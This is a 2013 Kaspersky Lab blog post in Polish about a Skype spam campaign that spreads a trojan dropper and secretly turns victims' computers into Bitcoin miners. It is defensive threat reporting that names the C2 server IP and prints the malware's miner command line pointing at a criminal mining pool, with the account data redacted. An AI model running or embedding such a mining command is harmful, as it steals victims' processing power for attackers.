Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Wydobywanie Bitcoinów przyczyną Armagedonu na Skypie

Dmitrij Bestużew
Kaspersky Lab Expert
Dodany 24 kwietnia 2013, 15:52 CEST
Tagi:

Czy dziś jest dzień Skype'a? Czy może dzień wydobywania Bitcoinów? A może jest to dzień wydobywania Bitcoinów za pośrednictwem Skype'a? 

Piszę tak, ponieważ chwilę po tym, jak opublikowałem poprzedni artykuł na temat szkodliwej kampanii toczącej się na Skypie, moja przyjaciółka z Wenezueli przesłała mi zrzut ekranu okna swojego klienta Skype'a, na którym widać kampanię podobną do omawianej przeze mnie pod względem rozprzestrzeniania, ale inną pod względem pochodzenia i przeznaczenia. Poniżej oryginalny zrzut ekranu: 

Skype_bitcoining_1.png
(Tłumaczenie z hiszpańskiego: to jest moje ulubione zdjęcie przedstawiające ciebie

Ta kampania narodziła się niedawno i wciąż jest bardzo aktywna: 

Skype-bitcoining_2_auto.png

Średnia liczba kliknięć złośliwego odsyłacza jest dosyć wysoka i oscyluje w granicy dwóch tysięcy kliknięć na godzinę! Większość potencjalnych ofiar mieszka we Włoszech, Rosji, Polsce, Kostaryce, Hiszpanii, Niemczech, Ukrainie i innych krajach. 

Początkowy dropper jest pobierany z serwera znajdującego się w Indiach. Współczynnik wykrywania tego szkodnika w serwisieVirusTotal początkowo był bardzo niski. Teraz zagrożenie jest wykrywane przez 32 z 46 rozwiązań antywirusowych. Po zainfekowaniu komputera ofiary, dropper ładuje do systemu pozostałe części całego szkodliwego programu. Złośliwe elementy pobierane są z serwisu Hotfile.com. W tym samym czasie szkodnik łączy się ze swoim serwerem centrum kontroli (C2), który zlokalizowany jest w Niemczech. 

Skype_bitcoining_3.png

Adres IP serwera C2 to 213.165.68.138:9000

Co robi to szkodliwe oprogramowanie? Szczerze powiedziawszy, przeprowadza ono wiele różnych działań, ale najciekawszą operacją jest przemiana komputera ofiary w „niewolnika” generatora Bitcoinów. Implikuje to gwałtowny wzrost użycia procesora. Oto przykład:

Skype_bitcoining_4.png

Szkodliwy proces uruchamiany jest rozkazem 
bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX (celowo zastąpiłem krytyczne dane symbolami XXXXXX). Proces przejmuje moc obliczeniową procesora, wykorzystując ją do wydobywania Bitcoinów dla cyberprzestępców. Jak wspomniałem, kampania jest ciągle aktywna. Jeśli zauważycie, że Wasze urządzenia są mocno obciążone i pracują z wykorzystaniem wszystkich dostępnych zasobów procesora, może to być symptomem infekcji. 

Początkowy dropper jest wykrywany przez produkty Kaspersky Lab jako: Trojan.Win32.Jorik.IRCbot.xkt.